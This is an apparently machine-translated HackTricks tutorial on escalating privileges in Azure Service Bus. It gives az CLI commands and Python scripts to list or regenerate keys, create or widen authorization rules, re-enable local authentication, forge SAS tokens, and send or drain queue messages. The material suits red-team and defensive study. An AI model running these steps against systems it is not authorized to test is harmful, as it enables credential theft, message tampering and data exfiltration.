HackTricks CloudAz - Service Bus Privesc
Reading time: 12 minutes
tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Service Bus
Za više informacija pogledajte:
Microsoft.ServiceBus/namespaces/authorizationrules/listKeys/action OR Microsoft.ServiceBus/namespaces/authorizationrules/regenerateKeys/action
Ove dozvole vam omogućavaju da dobijete ili regenerišete ključeve za lokalna pravila autorizacije unutar Service Bus imenskog prostora. Korišćenjem ovih ključeva moguće je autentifikovati se kao Service Bus imenski prostor, omogućavajući vam da šaljete poruke u bilo koju red ili temu, primate poruke iz bilo koje redne ili pretplatničke usluge, ili potencijalno interagujete sa sistemom na načine koji bi mogli ometati operacije, predstavljati validne korisnike ili ubrizgavati maliciozne podatke u tok poruka.
Imajte na umu da po defaultu RootManageSharedAccessKey pravilo ima punu kontrolu nad Service Bus imenskim prostorom i koristi se od strane az cli, međutim, mogu postojati i druga pravila sa drugim vrednostima ključeva.
# List keys
az servicebus namespace authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --authorization-rule-name RootManageSharedAccessKey [--authorization-rule-name RootManageSharedAccessKey]
# Regenerate keys
az servicebus namespace authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> [--authorization-rule-name RootManageSharedAccessKey]
Microsoft.ServiceBus/namespaces/AuthorizationRules/write
Sa ovom dozvolom je moguće napraviti novo pravilo autorizacije sa svim dozvolama i sopstvenim ključevima sa:
az servicebus namespace authorization-rule create --authorization-rule-name "myRule" --namespace-name mynamespacespdemo --resource-group Resource_Group_1 --rights Manage Listen Send
[!WARNING] Ova komanda ne odgovara sa ključevima, tako da ih morate dobiti prethodnim komandama (i dozvolama) kako biste eskalirali privilegije.
Pored toga, sa tom komandom (i Microsoft.ServiceBus/namespaces/authorizationRules/read) ako izvršite ovu akciju putem Azure CLI, moguće je ažurirati postojeće pravilo autorizacije i dati mu više dozvola (u slučaju da su nedostajale) sledećom komandom:
az servicebus namespace authorization-rule update \
--resource-group <MyResourceGroup> \
--namespace-name <MyNamespace> \
--name RootManageSharedAccessKey \
--rights Manage Listen Send
Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action OR Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action
Specifične teme i redovi unutar Service Bus imenskog prostora mogu imati svoja pravila autorizacije, koja se mogu koristiti za kontrolu pristupa entitetu. Imajući ove dozvole, možete pribaviti ili regenerisati ključeve za ova lokalna pravila autorizacije, omogućavajući vam da se autentifikujete kao entitet i potencijalno šaljete ili primate poruke, upravljate pretplatama ili komunicirate sa sistemom na načine koji bi mogli ometati operacije, predstavljati validne korisnike ili ubrizgati zlonamerne podatke u tok poruka.
# List keys (topics)
az servicebus topic authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name>
# Regenerate keys (topics)
az servicebus topic authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name>
# List keys (queues)
az servicebus queue authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name>
# Regenerate keys (queues)
az servicebus queue authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name>
Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/write
Sa ovom dozvolom je moguće napraviti novo pravilo autorizacije sa svim dozvolama i sopstvenim ključevima sa:
# In a topic
az servicebus topic authorization-rule create --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name> --rights Manage Listen Send
# In a queue
az servicebus queue authorization-rule create --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name> --rights Manage Listen Send
[!WARNING] Ova komanda ne odgovara sa ključevima, tako da ih morate dobiti prethodnim komandama (i dozvolama) kako biste eskalirali privilegije.
Pored toga, sa tom komandom (i Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/read) ako izvršite ovu akciju putem Azure CLI, moguće je ažurirati postojeće pravilo autorizacije i dati mu više dozvola (u slučaju da su nedostajale) sledećom komandom:
# In a topic
az servicebus topic authorization-rule update --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name> --rights Manage Listen Send
# In a queue
az servicebus queue authorization-rule update --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name> --rights Manage Listen Send
Microsoft.ServiceBus/namespaces/write (& Microsoft.ServiceBus/namespaces/read if az cli is used)
Sa ovim dozvolama napadač može ponovo omogućiti "lokalnu autentifikaciju" sledećom komandom i stoga će svi ključevi iz deljenih politika raditi.
az servicebus namespace update --disable-local-auth false -n <namespace-name> --resource-group <res-group>
Send Messages with keys (Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action OR Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action)
Možete preuzeti PrimaryConnectionString, koji deluje kao akreditiv za Service Bus namespace. Sa ovom konekcionom stringom, možete se potpuno autentifikovati kao Service Bus namespace, omogućavajući vam da šaljete poruke bilo kojoj redu ili temi i potencijalno interagujete sa sistemom na načine koji bi mogli ometati operacije, predstavljati validne korisnike ili ubrizgavati zlonamerne podatke u tok poruka. Ova metoda funkcioniše ako je --disable-local-auth postavljeno na false (tako da je lokalna autentifikacija omogućena).
import asyncio
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage
# pip install azure-servicebus
NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_OR_QUEUE_NAME = "<TOPIC_OR_QUEUE_NAME>"
async def send_message():
async with ServiceBusClient.from_connection_string(NAMESPACE_CONNECTION_STR) as client:
async with client.get_topic_sender(topic_name=TOPIC_OR_QUEUE_NAME) as sender:
await sender.send_messages(ServiceBusMessage("Hacktricks-Training: Single Item"))
print("Sent message")
asyncio.run(send_message())
Dodatno, možete slati poruke sa az rest, u ovom slučaju morate generisati sas token za korišćenje.
import time, urllib.parse, hmac, hashlib, base64
def generate_sas_token(uri, key_name, key, expiry_in_seconds=3600):
expiry = int(time.time() + expiry_in_seconds)
string_to_sign = urllib.parse.quote_plus(uri) + "\n" + str(expiry)
signed_hmac_sha256 = hmac.new(key.encode('utf-8'), string_to_sign.encode('utf-8'), hashlib.sha256).digest()
signature = urllib.parse.quote_plus(base64.b64encode(signed_hmac_sha256))
token = f"SharedAccessSignature sr={urllib.parse.quote_plus(uri)}&sig={signature}&se={expiry}&skn={key_name}"
return token
# Replace these with your actual values
resource_uri = "https://<namespace>.servicebus.windows.net/<queue_or_topic>"
key_name = "<SharedKeyName>"
primary_key = "<PrimaryKey>"
sas_token = generate_sas_token(resource_uri, key_name, primary_key)
print(sas_token)
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<queue>/messages" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=https%3A%2F%2F<NAMESPACE>.servicebus.windows.net%2F<TOPIC_OR_QUEUE_NAME>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>" \
--body "<MESSAGE_BODY>"
Receive with keys (Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action OR Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action)
Možete preuzeti PrimaryConnectionString, koji služi kao akreditiv za Service Bus namespace. Koristeći ovaj konekcioni string, možete primati poruke iz bilo koje queue ili subscription unutar namespace-a, omogućavajući pristup potencijalno osetljivim ili kritičnim podacima, omogućavajući exfiltraciju podataka ili ometajući obradu poruka i radne tokove aplikacija. Ova metoda funkcioniše ako je --disable-local-auth postavljeno na false.
import asyncio
from azure.servicebus.aio import ServiceBusClient
# pip install azure-servicebus
CONN_STR = "<PrimaryConnectionString>"
QUEUE = "<QUEUE_NAME>"
# For topics/subscriptions, you would use:
# TOPIC = "<TOPIC_NAME>"
# SUBSCRIPTION = "<TOPIC_SUBSCRIPTION_NAME>"
async def receive():
async with ServiceBusClient.from_connection_string(CONN_STR) as client:
# For a queue receiver:
async with client.get_queue_receiver(queue_name=QUEUE, max_wait_time=5) as receiver:
msgs = await receiver.receive_messages(max_wait_time=5, max_message_count=20)
for msg in msgs:
print("Received:", msg)
await receiver.complete_message(msg)
# For a topic/subscription receiver (commented out):
# async with client.get_subscription_receiver(topic_name=TOPIC, subscription_name=SUBSCRIPTION, max_wait_time=5) as receiver:
# msgs = await receiver.receive_messages(max_wait_time=5, max_message_count=20)
# for msg in msgs:
# print("Received:", msg)
# await receiver.complete_message(msg)
asyncio.run(receive())
print("Done receiving messages")
Dodatno, možete slati poruke sa az rest, u ovom slučaju morate generisati sas token za korišćenje.
import time, urllib.parse, hmac, hashlib, base64
def generate_sas_token(uri, key_name, key, expiry_in_seconds=3600):
expiry = int(time.time() + expiry_in_seconds)
string_to_sign = urllib.parse.quote_plus(uri) + "\n" + str(expiry)
signature = urllib.parse.quote_plus(base64.b64encode(
hmac.new(key.encode('utf-8'), string_to_sign.encode('utf-8'), hashlib.sha256).digest()
))
token = f"SharedAccessSignature sr={urllib.parse.quote_plus(uri)}&sig={signature}&se={expiry}&skn={key_name}"
return token
# Example usage:
resource_uri = "https://<namespace>.servicebus.windows.net/queue" # For queue
# resource_uri = "https://<namespace>.servicebus.windows.net/<topic>/subscriptions/<subscription>" # For topic subscription
sas_token = generate_sas_token(resource_uri, "<KEYNAME>", "<PRIMARY_KEY>")
print(sas_token)
Za red možete dobiti ili zaviriti u poruku (dobijanje poruka bi ih uklonilo, dok zavirivanje neće):
#Get a message
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<QUEUE>/messages/head?timeout=60" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#Peek a message
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<QUEUE>/messages/head?peekonly=true&timeout=60" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#You can select the meesage changing the field PreviousSequenceNumber
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<ENTITY>/messages?timeout=60&PreviousSequenceNumber=<LAST_SEQUENCE_NUMBER>&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
Please provide the text you would like translated.
#Get a message
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages/head?timeout=60" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#Peek a message
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages/head?timeout=60&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#You can select the meesage changing the field PreviousSequenceNumber
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages?timeout=60&PreviousSequenceNumber=<LAST_SEQUENCE_NUMBER>&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
Pošaljite poruke. DataActions: Microsoft.ServiceBus/namespaces/messages/send/action
Možete koristiti ova prava za slanje poruka, čak i ako je --disable-local-auth postavljeno na true.
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage
# pip install azure-servicebus
NS = "<namespace>.servicebus.windows.net" # Your namespace
QUEUE_OR_TOPIC = "<QUEUE_OR_TOPIC>" # Your queue name
async def run():
credential = DefaultAzureCredential()
async with ServiceBusClient(fully_qualified_namespace=NS, credential=credential) as client:
#async with client.get_topic_sender(topic_name=TOPIC) as sender: # Use this to send the message to a topic
async with client.get_queue_sender(queue_name=QUEUE) as sender:
await sender.send_messages(ServiceBusMessage("Single Message"))
print("Sent a single message")
await credential.close()
if __name__ == "__main__":
asyncio.run(run())
Prijem poruka. DataActions: Microsoft.ServiceBus/namespaces/messages/receive/action
Možete koristiti ova prava za prijem poruka, čak i ako je --disable-local-auth postavljeno na true.
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.servicebus.aio import ServiceBusClient
# pip install azure-servicebus
NS = "<namespace>.servicebus.windows.net"
QUEUE = "<QUEUE>"
# For a topic subscription, uncomment and set these values:
# TOPIC = "<TOPIC>"
# SUBSCRIPTION = "<SUBSCRIPTION>"
async def run():
credential = DefaultAzureCredential()
async with ServiceBusClient(fully_qualified_namespace=NS, credential=credential) as client:
# Receiving from a queue:
async with client.get_queue_receiver(queue_name=QUEUE, max_wait_time=5) as receiver:
async for msg in receiver:
print("Received from Queue:", msg)
await receiver.complete_message(msg)
# To receive from a topic subscription, uncomment the code below and comment out the queue receiver above:
# async with client.get_subscription_receiver(topic_name=TOPIC, subscription_name=SUBSCRIPTION, max_wait_time=5) as receiver:
# async for msg in receiver:
# print("Received from Topic Subscription:", msg)
# await receiver.complete_message(msg)
await credential.close()
asyncio.run(run())
print("Done receiving messages")
Reference
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.